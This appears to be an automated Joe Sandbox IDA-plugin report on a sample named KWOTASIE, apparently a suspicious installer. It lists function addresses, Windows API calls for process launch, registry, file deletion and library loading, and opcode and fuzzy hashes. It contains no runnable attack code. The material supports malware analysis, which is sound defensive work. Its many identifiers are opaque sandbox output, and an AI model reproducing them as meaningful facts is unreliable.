Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: CloseQueryValue
String ID: Remove folder:
API String ID: 3356406503-1958208860
Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction ID: 8ef6f3e619af491bbf380fd7d91826ebef08e06ae3c58d0c48453c9b41c80383
Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction Fuzzy Hash: BF014872500209FBDF218F51C909ADB3BA8EB55364F01802AFD1AA61A1D678D964CBA4

Function 00405831 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 0040585A
CloseHandle.KERNEL32(?), ref: 00405867

Strings

Error launching installer, xrefs: 00405844

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
Instruction ID: 0b6998b7e6fa6c2388fbdd89280d1adf89017549f97d9b179fdab4837609bc7e
Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
Instruction Fuzzy Hash: ADE0BFB560020ABFEB109F65ED09F7B76ACFB14604F414535BD51F2150D7B4E8158A7C

Function 00406D8B Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
Instruction ID: db5c32ec8170847eb5f60efc1784393b24ec0eb305c02a0c5cf020035e361845
Opcode Fuzzy Hash: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
Instruction Fuzzy Hash: 76A15571E04229CBDF28CFA8C8546ADBBB1FF44305F10816AD856BB281C7786A86DF45

Function 00406F8C Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
Instruction ID: 8e32eb5403c84004d501a5d2bb1c7049f427415ce0bc154380a8816354db292b
Opcode Fuzzy Hash: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
Instruction Fuzzy Hash: AE914271E04228CBDF28CF98C8547ADBBB1FF44305F14816AD856BB281C778AA86DF45

Function 00406CA2 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
Instruction ID: 030bbf204142f55243dad992a5db991e5d63a74ebaef12f83509f41b37c8d212
Opcode Fuzzy Hash: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
Instruction Fuzzy Hash: BC813371E04228DFDF24CFA8C8447ADBBB1FB44305F25816AD856BB281C738A986DF55

Function 004067A7 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
Instruction ID: 067318748fb0e7e332f05a89f7f4937fcdaac86c909a37b822a7e26141377c2a
Opcode Fuzzy Hash: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
Instruction Fuzzy Hash: 84814571E04228DFDB28CFA9C8447ADBBB1FB44305F11816AD856BB2C1C778A986DF45

Function 00406BF5 Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
Instruction ID: 5bbe2b58965c0beeac19dcf892031eaf3bd84ec3573d7bafdcb84a7f6e2b809b
Opcode Fuzzy Hash: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
Instruction Fuzzy Hash: 9A713471E04228DFDF28CFA8C9447ADBBB1FB44305F15806AE846BB280C7389996DF44

Function 00406D13 Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
Instruction ID: 95b660950287b107d15ca963a4456fab735294b344fdd2f3256912a70e30144d
Opcode Fuzzy Hash: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
Instruction Fuzzy Hash: A4713371E04228DBDF28CF98C844BADBBB1FF44305F15806AD856BB280C7789996DF45

Function 00406C5F Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
Instruction ID: 7d50f74d422c9426a2654202d950de31cd619cd826110beab4429d7d99e33e8a
Opcode Fuzzy Hash: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
Instruction Fuzzy Hash: F9715671E04229DBDF28CF98C9447ADBBB1FF44305F11806AD856BB281C7389986DF44

Function 0040202C Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00402057

Part of subcall function 004052B0: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
Part of subcall function 004052B0: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,00403233), ref: 0040530B
Part of subcall function 004052B0: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\), ref: 0040531D
Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B

LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402068
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020E5

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 628baef28817a81c71994b7e30bb88f3b0fcf433efaa12a31af4226d967a1e72
Instruction ID: 1b7e6cc8a89e608973352e39bc6088f07de5daa2050f71ccd5864d961518f39c
Opcode Fuzzy Hash: 628baef28817a81c71994b7e30bb88f3b0fcf433efaa12a31af4226d967a1e72
Instruction Fuzzy Hash: 0321B331900218EBCF216FA5CE4DAAE7A70AF04354F60413BF511B51E1DBBD4951DA6E

Function 004024F2 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402525
RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402538
RegCloseKey.ADVAPI32(?,?,?,C:\Windows\resources\0809\vovhundenes\harmonikasammenstdet.oct,00000000,00000011,00000002), ref: 00402551

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: 85de37ce9f1551cc19b4aaeaba6f815841acf3dc3c6dcfdbeb54887700a6ff00
Instruction ID: caf525ecc09255a736170ff5365d3a7771f075d5505ff7476addd39d58865d97
Opcode Fuzzy Hash: 85de37ce9f1551cc19b4aaeaba6f815841acf3dc3c6dcfdbeb54887700a6ff00
Instruction Fuzzy Hash: 4A017171904104EFE7159FA5DE89ABFB6BCEF44348F10403EF105A62D0DAB84E459B69

Function 00405912 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00405D19: GetFileAttributesW.KERNELBASE(?,?,0040591E,?,?,00000000,00405AF4,?,?,?,?), ref: 00405D1E
Part of subcall function 00405D19: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405D32

RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405AF4), ref: 0040592D
DeleteFileW.KERNEL32(?,?,?,00000000,00405AF4), ref: 00405935
SetFileAttributesW.KERNEL32(?,00000000), ref: 0040594D

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: File$Attributes$DeleteDirectoryRemove
String ID:
API String ID: 1655745494-0
Opcode ID: 280825f6b60181aa2d378306bbdc3da53de5ab3d89a200e418c4f7b9ea6af3cc
Instruction ID: 17dbb9b376b1e0a69a8f5a3d2989cdc6b1ef337040164146c9d977961067fcf0
Opcode Fuzzy Hash: 280825f6b60181aa2d378306bbdc3da53de5ab3d89a200e418c4f7b9ea6af3cc
Instruction Fuzzy Hash: C9E06571115A91DAC3507B359908B5F2F98EF86374F06493BF592B21D0C77848168A6E

Function 0040247E Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024AF
RegCloseKey.ADVAPI32(?,?,?,C:\Windows\resources\0809\vovhundenes\harmonikasammenstdet.oct,00000000,00000011,00000002), ref: 00402551

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 9b93021daec53c8edcc5d76aba2d99c2d32eec4d9dadaf17146ed5e41d543e33
Instruction ID: 1ba1cbfe7526e94493429aa356f7c232dcc3bab2ce10746d05ed9864f28b52f9
Opcode Fuzzy Hash: 9b93021daec53c8edcc5d76aba2d99c2d32eec4d9dadaf17146ed5e41d543e33
Instruction Fuzzy Hash: C2119131900209EFEB24DFA4CA585AEB6B4EF04344F20843FE046A62C0D6B84A45DB5A

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
Instruction ID: 643084589b99c3aa520b22feaac895240b719bdb66a029b0c5212504e21fbf59
Opcode Fuzzy Hash: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
Instruction Fuzzy Hash: 7A01F4317242119BEB195B799D09B3A3798E710314F14463FF855F62F1DA78CC529B4C

Function 00402388 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs
